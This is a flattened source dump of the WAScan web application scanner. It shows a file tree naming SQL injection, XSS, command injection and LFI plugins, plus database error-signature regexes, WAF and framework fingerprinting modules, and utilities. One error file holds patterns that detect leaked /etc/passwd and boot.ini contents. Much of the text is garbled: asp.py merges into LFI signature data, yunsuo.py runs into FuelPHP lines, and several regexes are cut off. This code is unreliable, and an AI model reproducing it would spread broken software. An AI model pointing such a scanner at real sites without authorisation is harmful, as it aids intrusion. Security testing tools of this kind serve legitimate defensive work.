├── CHANGELOG ├── VERSION ├── requirements.txt ├── screen ├── screen_1.png └── screen_2.png ├── lib ├── db │ ├── sqldberror │ │ ├── firebird.json │ │ ├── maxdb.json │ │ ├── frontbase.json │ │ ├── ingres.json │ │ ├── db2.json │ │ ├── hsqldb.json │ │ ├── informix.json │ │ ├── sybase.json │ │ ├── sqlite.json │ │ ├── oracle.json │ │ ├── maccess.json │ │ ├── postgresql.json │ │ ├── mysql.json │ │ └── mssql.json │ ├── errors │ │ ├── buffer.json │ │ ├── ldap.json │ │ ├── lfi.json │ │ └── xpath.json │ ├── phpinfo.wascan │ ├── adminpanel.wascan │ ├── backdoor.wascan │ └── commondir.wascan ├── __init__.py ├── request │ ├── __init__.py │ ├── ragent.py │ ├── request.py │ └── crawler.py ├── utils │ ├── __init__.py │ ├── unicode.py │ ├── readfile.py │ ├── colors.py │ ├── rand.py │ ├── exception.py │ ├── printer.py │ ├── settings.py │ ├── params.py │ ├── check.py │ ├── usage.py │ └── payload.py ├── handler │ ├── __init__.py │ ├── fullscan.py │ ├── crawler.py │ ├── audit.py │ ├── brute.py │ ├── disclosure.py │ ├── attacks.py │ └── fingerprint.py └── parser │ ├── __init__.py │ ├── getip.py │ ├── getmail.py │ ├── getcc.py │ ├── getssn.py │ └── parse.py ├── plugins ├── __init__.py ├── audit │ ├── __init__.py │ ├── xst.py │ ├── apache.py │ ├── phpinfo.py │ ├── robots.py │ └── dav.py ├── brute │ ├── __init__.py │ ├── adminpanel.py │ ├── backdoor.py │ ├── commonfile.py │ ├── backupfile.py │ ├── backupdir.py │ └── commondir.py ├── disclosure │ ├── __init__.py │ ├── emails.py │ ├── creditcards.py │ ├── privateip.py │ ├── ssn.py │ └── errors.py ├── attacks │ ├── __init__.py │ ├── ssi.py │ ├── bashi.py │ ├── htmli.py │ ├── xss.py │ ├── oscommand.py │ ├── headerxss.py │ ├── phpi.py │ ├── blindsqli.py │ ├── ldapi.py │ ├── xpathi.py │ ├── lfi.py │ ├── sqli.py │ ├── bufferoverflow.py │ └── headersqli.py └── fingerprint │ ├── __init__.py │ ├── cms │ ├── __init__.py │ ├── wordpress.py │ ├── silverstripe.py │ ├── joomla.py │ ├── drupal.py │ ├── plone.py │ └── magento.py │ ├── os │ ├── __init__.py 
│ ├── bsd.py │ ├── unix.py │ ├── mac.py │ ├── ibm.py │ ├── windows.py │ ├── solaris.py │ └── linux.py │ ├── waf │ ├── __init__.py │ ├── knownsec.py │ ├── wallarm.py │ ├── senginx.py │ ├── sophos.py │ ├── varnish.py │ ├── webknight.py │ ├── expressionengine.py │ ├── sitelock.py │ ├── uspses.py │ ├── betterwpsecurity.py │ ├── stingray.py │ ├── blockdos.py │ ├── armor.py │ ├── aws.py │ ├── edgecast.py │ ├── airlock.py │ ├── paloalto.py │ ├── teros.py │ ├── asm.py │ ├── kona.py │ ├── nsfocus.py │ ├── baidu.py │ ├── datapower.py │ ├── urlscan.py │ ├── yundun.py │ ├── ciscoacexml.py │ ├── comodo.py │ ├── fortiweb.py │ ├── newdefend.py │ ├── hyperguard.py │ ├── anquanbao.py │ ├── trafficshield.py │ ├── cloudfront.py │ ├── netcontinuum.py │ ├── barracuda.py │ ├── radware.py │ ├── safe3.py │ ├── safedog.py │ ├── netscaler.py │ ├── profense.py │ ├── yunsuo.py │ ├── sonicwall.py │ ├── denyall.py │ ├── dotdefender.py │ ├── binarysec.py │ ├── isaserver.py │ ├── modsecurity.py │ ├── secureiis.py │ ├── bigip.py │ ├── sucuri.py │ ├── requestvalidationmode.py │ ├── incapsula.py │ ├── jiasule.py │ └── cloudflare.py │ ├── header │ ├── __init__.py │ ├── cookies.py │ └── header.py │ ├── language │ ├── __init__.py │ ├── asp.py │ ├── flash.py │ ├── perl.py │ ├── python.py │ ├── ruby.py │ ├── coldfusion.py │ ├── php.py │ ├── java.py │ └── aspnet.py │ ├── server │ ├── __init__.py │ └── server.py │ └── framework │ ├── __init__.py │ ├── flask.py │ ├── cakephp.py │ ├── play.py │ ├── larvel.py │ ├── cherrypy.py │ ├── karrigell.py │ ├── codeigniter.py │ ├── dancer.py │ ├── nette.py │ ├── phalcon.py │ ├── spring.py │ ├── symfony.py │ ├── yii.py │ ├── web2py.py │ ├── fuelphp.py │ ├── grails.py │ ├── seagull.py │ ├── django.py │ ├── asp_mvc.py │ ├── zend.py │ ├── rails.py │ └── horde.py ├── .gitignore ├── README.md └── wascan.py /CHANGELOG: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /VERSION: -------------------------------------------------------------------------------- 1 | WAScan v0.1.0 -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | BeautifulSoup -------------------------------------------------------------------------------- /screen/screen_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FOGSEC/WAScan/HEAD/screen/screen_1.png -------------------------------------------------------------------------------- /screen/screen_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FOGSEC/WAScan/HEAD/screen/screen_2.png -------------------------------------------------------------------------------- /lib/db/sqldberror/firebird.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Firebird","regexp":["Dynamic SQL Error","Warning.*ibase_.*"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/maxdb.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"SAP MaxDB","regexp":["SQL error.*POS([0-9]+).*","Warning.*maxdb.*"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/frontbase.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Frontbase","regexp":["Exception (condition )?\\d+. 
Transaction rollback."]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/ingres.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Ingres","regexp":["Warning.*ingres_","Ingres SQLSTATE","Ingres\\W.*Driver"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/db2.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"DB2","regexp":["CLI Driver.*DB2","DB2 SQL error","\bdb2_\\w+\\(","SQLSTATE.+SQLCODE"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/hsqldb.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"HSQLDB","regexp":["org\\.hsqldb\\.jdbc","Unexpected end of command in statement \\[","Unexpected token.*in statement \\["]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/informix.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Informix","regexp":["Exception.*Informix","Informix ODBC Driver","com\\.informix\\.jdbc","weblogic\\.jdbc\\.informix"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/sybase.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Sybase","regexp":["Warning.*sybase.*","Sybase message","Sybase.*Server message.*","SybSQLException","com\\.sybase\\.jdbc"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/sqlite.json: -------------------------------------------------------------------------------- 1 | 
{"db":{"name":"SQLite","regexp":["SQLite/JDBCDriver","SQLite\\.Exception","System\\.Data\\.SQLite\\.SQLiteException","Warning.*sqlite_.*","Warning.*SQLite3::","\\[SQLITE_ERROR\\]"]}} -------------------------------------------------------------------------------- /lib/db/errors/buffer.json: -------------------------------------------------------------------------------- 1 | {"info":{"name":"BOF","regexp":["\\*\\*\\* stack smashing detected \\*\\*\\*:","\\\\\n\\500 Internal Server Error\\<\\/title\\>\n","Internal Server Error\\<\\/h1\\>"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/oracle.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Oracle","regexp":["\bORA-\\d{5}","Oracle error","Oracle.*Driver","Warning.*\\Woci_.*","Warning.*\\Wora_.*","oracle\\.jdbc\\.driver","quoted string not properly terminated"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/maccess.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Microsoft Access","regexp":["Microsoft Access (\\d+ )?Driver","JET Database Engine","Access Database Engine","ODBC Microsoft Access","Syntax error \\(missing operator\\) in query expression"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/postgresql.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"PostgreSQL","regexp":["PostgreSQL.*ERROR","Warning.*\\Wpg_.*","valid PostgreSQL result","Npgsql\\.","PG::SyntaxError:","org\\.postgresql\\.util\\.PSQLException","ERROR:\\s\\ssyntax error at or near "]}} -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 
# 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /lib/request/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /lib/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' -------------------------------------------------------------------------------- /plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /plugins/audit/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/brute/__init__.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /lib/handler/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /lib/parser/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /plugins/disclosure/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/attacks/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 
'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /plugins/fingerprint/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/cms/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/os/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/waf/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /lib/db/sqldberror/mysql.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"MySQL","regexp":["SQL 
syntax.*MySQL","Warning.*mysql_.*","MySqlException \\(0x","valid MySQL result","check the manual that corresponds to your (MySQL|MariaDB) server version","MySqlClient\\.","com\\.mysql\\.jdbcd\\.exceptions"]}} -------------------------------------------------------------------------------- /plugins/fingerprint/header/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/language/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/server/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/framework/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 
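--------------------------------------------------------------------------------
/lib/db/errors/ldap.json:
--------------------------------------------------------------------------------
1 | {"info":{"name":"LDAP","regexp":["supplied argument is not a valid ldap","javax\\.naming\\.NameNotFoundException","javax\\.naming\\.directory\\.InvalidSearchFilterException","Invalid DN syntax","LDAPException*","Module Products\\.LDAPMultiPlugins","IPWorksASP\\.LDAP","Local error occurred","Object does not exist","An inappropriate matching occurred"]}}
--------------------------------------------------------------------------------
/lib/utils/unicode.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | #
4 | # @name: Wascan - Web Application Scanner
5 | # @repo: https://github.com/m4ll0k/Wascan
6 | # @author: Momo Outaadi (M4ll0k)
7 | # @license: See the file 'LICENSE.txt'
8 |
9 | def ucode(string):
10 |     """Return *string* UTF-8 encoded when it is a unicode object, else unchanged."""
11 |     # Python 2 only: the builtin name `unicode` does not exist on Python 3.
12 |     if isinstance(string,unicode):
13 |         return string.encode('utf-8')
14 |     return string
--------------------------------------------------------------------------------
/lib/utils/readfile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | #
4 | # @name: Wascan - Web Application Scanner
5 | # @repo: https://github.com/m4ll0k/Wascan
6 | # @author: Momo Outaadi (M4ll0k)
7 | # @license: See the file 'LICENSE.txt'
8 |
9 | def readfile(path):
10 |     """Read the file at *path* and return its lines with surrounding whitespace stripped.
11 |
12 |     Returns None when *path* is None or the empty string. The file is opened
13 |     in binary mode, so the items are byte strings.
14 |     """
15 |     # A combined `path != None or path != ""` test is true for every value,
16 |     # which left the bare return unreachable and passed None/"" on to open().
17 |     if path is None or path == "":
18 |         return
19 |     # The context manager closes the handle as soon as the list is built
20 |     # instead of leaving it to the garbage collector.
21 |     with open(path,'rb') as handle:
22 |         return [line.strip() for line in handle]
--------------------------------------------------------------------------------
/plugins/fingerprint/language/asp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | #
4 | # @name: Wascan - Web Application Scanner
5 | # @repo: 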
https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import findall,I 10 | 11 | def asp(content): 12 | _ = findall(r'\Warning\\<\\/b\\>: file\\(","\\Warning\\<\\/b\\>: file_get_contents\\(","open_basedir restriction in effect","Failed opening [\\'\\S*\\'] for inclusion \\(","failed to open stream\\:","root\\:\\/root\\:\\/bin\\/bash","default=multi([0])disk([0])rdisk([0])partition([1])\\WINDOWS"]}} -------------------------------------------------------------------------------- /plugins/fingerprint/framework/symfony.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def symfony(headers,content): 12 | _ = False 13 | _ |= search(r"\"powered by symfony\"",content) is not None 14 | _ |= search(r"Powered by \",content) is not None 15 | if _ : return "Symfony - PHP Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/cloudfront.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def cloudfront(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0].lower() == "x-amz-cf-id" 15 | _ |= search(r'cloudfront',header[1],I) is not None 16 | if _: break 17 | if _ : 18 | return "CloudFront (Amazon)" -------------------------------------------------------------------------------- 
/plugins/fingerprint/framework/yii.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def yii(headers,content): 12 | _ = False 13 | _ |= search(r"\Yii Framework\<\/a\>",content) is not None 14 | _ |= search(r"\>Yii Framework\<\/a\>",content) is not None 15 | if _ : return "Yii - PHP Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/netcontinuum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def netcontinuum(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'NCI__SessionId=',header[1],I) is not None 15 | if _:break 16 | if _ : 17 | return "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/barracuda.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def barracuda(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'\Abarra_counter_session=|(\A|\b)barracuda_',header[1],I) is not None 15 | if _ : break 
16 | if _: 17 | return "Barracuda Web Application Firewall (Barracuda Networks)" -------------------------------------------------------------------------------- /plugins/fingerprint/framework/web2py.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def web2py(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search("web2py",header[1]) is not None 15 | if _ : break 16 | _ |= search(r"\
",content) is not None 17 | if _ : return "Web2Py - Python Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/radware.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def radware(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0] == "x-sl-compstate" 15 | if _:break 16 | _ |= search(r'Unauthorized Activity Has Been Detected.+Case Number:',content) is not None 17 | if _ : 18 | return "AppWall (Radware)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/safe3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def safe3(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'Safe3 Web Firewall|Safe3',header[1],I) is not None 15 | _ |= search(r'Safe3WAF',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "Safe3 Web Application Firewall" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/safedog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | 
from re import search,I 10 | 11 | def safedog(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'safedog',header[1],I) is not None 15 | _ |= search(r'waf/2\.0',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "Safedog Web Application Firewall (Safedog)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/netscaler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def netscaler(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'(ns_af=|citrix_ns_id|NSC_)',header[1],I) is not None 15 | _ |= search(r'ns.cache',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "NetScaler (Citrix Systems)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/profense.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def profense(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'profense',header[1],I) is not None 15 | _ |= search(r'PLBSID=',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "Profense Web Application Firewall (Armorlogic)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/yunsuo.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def yunsuo(headers,content): 12 | _ = False 13 | _ |= search('FuelPHP\<\/a\>",content) is not None 17 | if _ : return "FuelPHP - PHP Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/framework/grails.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def grails(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search("grails",header[1]) is not None 15 | _ |= search("x-grails",header[0]) is not None 16 | _ |= search("x-grails-cached",header[0]) is not None 17 | if _ : break 18 | if _ : return "Grails - Java Framework" -------------------------------------------------------------------------------- /lib/handler/fullscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | 10 | from lib.utils.printer import * 11 | from lib.handler.audit import * 12 | from lib.handler.brute import * 13 | from lib.handler.attacks import * 14 | from lib.handler.disclosure import * 15 | from lib.handler.fingerprint import * 16 | 17 | def FullScan(kwargs,url,data): 18 | if '?' 
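in url: 19 | Attacks(kwargs,url,data) 20 | Disclosure(kwargs,url,data) 21 |
--------------------------------------------------------------------------------
/plugins/disclosure/emails.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | #
4 | # @name: Wascan - Web Application Scanner
5 | # @repo: https://github.com/m4ll0k/Wascan
6 | # @author: Momo Outaadi (M4ll0k)
7 | # @license: See the file 'LICENSE.txt'
8 |
9 | from lib.utils.printer import *
10 | from lib.parser.parse import *
11 |
12 | def emails(content):
13 |     """Report e-mail addresses found in *content* through plus().
14 |
15 |     Nothing is printed when the parser yields no addresses. Returns None.
16 |     """
17 |     # presumably getmail() returns a list of address strings; verify in lib/parser
18 |     _list_ = parse(content).getmail()
19 |     # A combined `!= None or != []` test is always true, so a None result
20 |     # would reach len() and raise TypeError; bail out on None/empty instead.
21 |     if not _list_:
22 |         return
23 |     if len(_list_) >= 2:
24 |         # str(list) with the enclosing brackets cut off: quoted, comma-separated items
25 |         plus('Email address disclosure: %s'%(str(_list_).split('[')[1].split(']')[0]))
26 |     elif len(_list_) == 1:
27 |         plus('Email address disclosure: %s'%_list_[0])
--------------------------------------------------------------------------------
/lib/request/ragent.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | #
4 | # @name: Wascan - Web Application Scanner
5 | # @repo: https://github.com/m4ll0k/Wascan
6 | # @author: Momo Outaadi (M4ll0k)
7 | # @license: See the file 'LICENSE.txt'
8 |
9 | from os import path
10 | from random import randint
11 | from lib.utils.readfile import *
12 |
13 | def ragent():
14 |     """Return one User-Agent string picked at random from lib/db/useragent.wascan."""
15 |     # Resolve lib/ from this module's own location (lib/request/ragent.py).
16 |     # Splitting the absolute path on the substring 'lib' picks the wrong
17 |     # directory whenever a parent directory name also contains 'lib'
18 |     # (for example a checkout under /usr/lib/...).
19 |     libdir = path.dirname(path.dirname(path.realpath(__file__)))
20 |     realpath = path.join(libdir,'db','useragent.wascan')
21 |     user_agents = readfile(realpath)
22 |     # NOTE(review): an empty file still ends in ValueError from randint(0,-1).
23 |     return user_agents[randint(0,len(user_agents)-1)]
--------------------------------------------------------------------------------
/plugins/fingerprint/waf/binarysec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | #
4 | # @name: Wascan - Web Application Scanner
5 | # 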
